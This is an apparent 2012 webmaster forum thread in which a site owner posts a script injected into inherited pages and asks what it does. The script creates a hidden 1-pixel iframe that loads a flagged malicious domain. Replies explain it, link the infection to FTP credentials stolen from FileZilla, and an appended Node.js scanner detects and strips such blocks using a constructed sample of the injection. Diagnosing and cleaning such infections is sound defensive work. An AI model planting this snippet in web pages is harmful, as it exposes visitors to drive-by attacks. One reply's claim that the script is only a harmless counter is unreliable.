
Webmaster General Forum

    
What is the function of this script in a website I'm inheriting
Concerned because it contains a url to a 'known attack site'
Anonymoose




msg:4468872
 12:43 pm on Jun 24, 2012 (gmt 0)

A set of websites I inherited have a script on them that worries me. I suspect he used it to generate page stats, but am not certain. If so, why is the url to a known attack site according to a couple of security programs? I would have assumed that the ISP would generate extensive stats that could be used and wouldn't require a separate URL? The ISP is web66.com. The offending url is onmouseup.info.

If I delete the entire script from the source code, ALL of the source code disappears from the entire page.

Regardless, here's the script- I hope it posts properly...

<script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script><!--/c3284d-->

I'll be most grateful to anyone who can shed some meaningful light on this.

 

lucy24




msg:4469004
 10:09 pm on Jun 24, 2012 (gmt 0)

If I delete the entire script from the source code, ALL of the source code disappears from the entire page.

Obvious question first: Is this behavior exactly the same, whether or not you are in fact using MSIE || Firefox?

:: wandering off thinking evil thoughts about buggy site whose webmaster went AWOL in 2009 ::

Anonymoose




msg:4469014
 10:38 pm on Jun 24, 2012 (gmt 0)

Lucy24, I don't understand your question? I was using HTML-Kit to edit the source code on a copy of the site that I'd downloaded to my computer. When I deleted that script just to see what if anything would change on the page, ALL of the page coding disappeared too (from the html editing panel). Of course I could just hit 'undo' and have it all back - including the questionable script. That behavior made me even more suspicious that it's somehow malicious coding - why won't it let me delete the script just to see the effect on the site?

Maybe it's innocuous and I'm just too green, but that it contains the url to a known attack site, and appears to be hidden, and won't let me delete it without deleting the entire page all makes me suspicious so I'm trying to find out what's going on...

Anonymoose




msg:4469031
 11:54 pm on Jun 24, 2012 (gmt 0)

Now I'm more perplexed - just went back into the index page using HTTrack as editor, and this time it let me delete the script without problem.

I'd still like to know what the script is supposed to do, how it affects people surfing the site, and how to clean it thoroughly from the sites assuming it is malicious.

Shotgunning on the web, I did find it as malicious on Sucuri Malware Labs (http://labs.sucuri.net/?details=onmouseup.info) but I have no idea how reputable they are or aren't, and it provides zero information about what this script does.

g1smd




msg:4469036
 12:17 am on Jun 25, 2012 (gmt 0)

"If the visiting UA is Firefox or MSIE, append an invisible 1 pixel iframe to the body, position it top left on screen, and within it load something which counts this pageview."

Anonymoose




msg:4469042
 1:06 am on Jun 25, 2012 (gmt 0)

Ok... and thank you for the code to English translation!

Any idea why it would do that, and why is it considered to be malicious? What harm does or can it do to site visitors or site integrity? The hosting company wouldn't be using a known attack site to track page views for basic website stats, would they? Or maybe the webmaster was using an outside source for site stats and didn't realize that it's had problems with attack code of some sort?

lucy24




msg:4469079
 3:32 am on Jun 25, 2012 (gmt 0)

What does

<!--/c3284d-->

mean? Or is it just a cross-reference to something like the counter number?

More to the point: Why do they need to do all that "createElement('iframe')" and "getElementsByTagName" business instead of just shoving in a 1x1 transparent gif like the rest of us? For that matter, why even bother to check UA? Wouldn't it be easier to pull all the data and then delete the webkits and operas at your leisure?

Anonymoose




msg:4469081
 4:10 am on Jun 25, 2012 (gmt 0)

Lucy24, your guess is as good as mine on the <!--/c3284d-->. Looks like an html comment, but what the heck it means or why it's there I have no clue and wondered also. There are a couple more of them in the same vicinity - no idea if the current guy put them there, or maybe it's something HTTrack does when downloading a site? (doubt it)...

Anyhow, I figured that was less important than the script issue by far. I posted that over at https://badwarebusters.org/main/itemview/29499?t=5821#itemblock-29501 also. A moderator there also said it's malicious (but not why). If I understand his reply correctly, he's saying that the thing downloads the entire contents (whatever that may be) of that onmouseup.info page anytime a webpage with that script is loaded in IE or Firefox....

So I'm still confused about how it would have gotten there and exactly what it's supposed to do.

Leosghost




msg:4469096
 6:26 am on Jun 25, 2012 (gmt 0)

Guessing it is c <= counter 3284 <= counter number d <= reference of some sort..in a comment

It doesn't download the entire contents of the other site page..it does what g1smd says it does..it loads a single pixel and counts how many times it loads it..

It could do other stuff ( which could be malicious if set up right )..but at the moment it isn't..

tiger




msg:4470065
 1:22 pm on Jun 27, 2012 (gmt 0)

Hi all
I have the same problem on my website

I found that every index.asp or index.aspx page was infested by the code in the first post. I have removed the code but Google is telling me there is malware. Perhaps it will take some days to get back to the original status.
I have found the problem. It works by stealing your password from the FTP client (I use FileZilla); a post that explains this in detail is here

[edited by: engine at 3:36 pm (utc) on Jun 27, 2012]
[edit reason] removed links to protect others from potential malware [/edit]

tiger




msg:4470162
 4:04 pm on Jun 27, 2012 (gmt 0)

Excuse me for posting the link to my website entirely; however, the second was good for explaining the problem. The problem is in the FTP account of FileZilla, in this file: sitemanager.xml, located in

users/user/AppData/FileZilla

change FTP password

jimbeetle




msg:4470268
 9:43 pm on Jun 27, 2012 (gmt 0)

change FTP password

And give the machine you use for FTP a good scrub, it might have been infected by a keylogger.

tiger




msg:4470363
 8:38 am on Jun 28, 2012 (gmt 0)

Yes, in fact the best method is to encrypt the FTP file with the TrueCrypt software. I have a problem with my PC but on my virtual machine it works. So I advise this: in this manner sitemanager.xml is encrypted and the file is deleted once you have uploaded the files.
In the meantime my website has come back to normal.
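
An added example, not part of any post in this thread: a Node.js scanner for a downloaded copy of a page that flags script blocks with the traits g1smd describes (user-agent check, 1-pixel hidden iframe) together with a trailing marker comment like the one in the first post, and strips them. The sample page and the host files.example.invalid are constructed, and the function names are this example's own.

```javascript
// Added example: flag <script> blocks that build a hidden iframe, as in the first post.
// SAMPLE is constructed; files.example.invalid is a placeholder host.
const SAMPLE = '<html><body><p>Hello</p>' +
  '<script>var url="http://files.example.invalid/stats.php";' +
  'if(navigator.userAgent.toLowerCase().indexOf("msie")>=0){' +
  'var f=document.createElement(\'iframe\');f.setAttribute("width","1");' +
  'f.setAttribute("height","1");f.setAttribute("src",url);' +
  'f.setAttribute("style","visibility: hidden; position: absolute;");' +
  'document.getElementsByTagName("body")[0].appendChild(f)}</script><!--/c3284d-->' +
  '<script>document.title="ok";</script></body></html>';

// Each trait is one of the things the thread's script does.
const TRAITS = {
  createsIframe: /createElement\(\s*['"]iframe['"]\s*\)/i,
  onePixel: /setAttribute\(\s*['"](?:width|height)['"]\s*,\s*['"][01]['"]\s*\)/i,
  hidden: /visibility\s*:\s*hidden|display\s*:\s*none/i,
  uaGate: /navigator\.userAgent/i,
};
// A script block plus an optional trailing marker comment such as <!--/c3284d-->.
const BLOCK = /<script\b[^>]*>([\s\S]*?)<\/script>(\s*<!--\/?[0-9a-f]{4,}-->)?/gi;

function scanHtml(html) {
  const findings = [];
  for (const m of html.matchAll(BLOCK)) {
    const body = m[1];
    const traits = Object.keys(TRAITS).filter((k) => TRAITS[k].test(body));
    // Require iframe creation plus at least one concealment trait to limit false positives.
    if (!traits.includes('createsIframe') || traits.length < 2) continue;
    const hosts = [...body.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)].map((u) => u[1].toLowerCase());
    findings.push({ offset: m.index, length: m[0].length, traits,
      hosts: [...new Set(hosts)], marker: m[2] ? m[2].trim() : null });
  }
  return findings;
}

// Remove flagged blocks back to front so earlier offsets stay valid.
function stripFindings(html, findings) {
  return [...findings].sort((a, b) => b.offset - a.offset)
    .reduce((out, f) => out.slice(0, f.offset) + out.slice(f.offset + f.length), html);
}

const found = scanHtml(SAMPLE);
console.log(JSON.stringify(found, null, 2));
console.log(stripFindings(SAMPLE, found));
```

Run it over every file in the site copy, not just the index pages, and review each finding before stripping, since a legitimate widget can also create an iframe from script.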
